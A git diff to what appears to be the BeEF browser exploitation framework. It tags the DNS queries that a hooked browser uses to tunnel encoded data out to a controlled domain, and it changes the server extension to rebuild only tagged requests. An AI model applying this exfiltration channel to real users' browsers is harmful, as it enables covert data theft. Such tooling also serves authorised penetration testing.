diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index 02aa65ef9..106b6e698 100644
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -71,11 +71,13 @@ beef.net.dns = {
 
         var segments = encodedData.chunk(max_data_segment_length);
 
+        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
+
         //TODO remove this
         console.log(segments.length);
 
         for (var seq=1; seq<=segments.length; seq++) {
-            sendQuery(msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
+            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
         }
 
 		// callback - returns the number of queries sent
diff --git a/extensions/dns/dns.rb b/extensions/dns/dns.rb
index 8abc4c027..a8fe43651 100644
--- a/extensions/dns/dns.rb
+++ b/extensions/dns/dns.rb
@@ -140,9 +140,14 @@ module BeEF
           @lock.synchronize do
 	        print_debug "Received DNS request (name: #{name} type: #{format_resource(resource)})"
 
-            # no need to parse AAAA resources when data is extruded from client
-            if format_resource(resource) == 'A'
-              reconstruct(name)
+            # no need to parse AAAA resources when data is extruded from client. Also we check if the FQDN starts with the 0xb3 string.
+            # this 0xb3 is convenient to clearly separate DNS requests used to extrude data from normal DNS requests than should be resolved by the DNS server.
+            if format_resource(resource) == 'A' and name.match(/^0xb3/)
+              reconstruct(name.split('0xb3').last)
+              catch (:done) do
+                transaction.fail!(:NXDomain)
+              end
+              return
             end
 
             catch (:done) do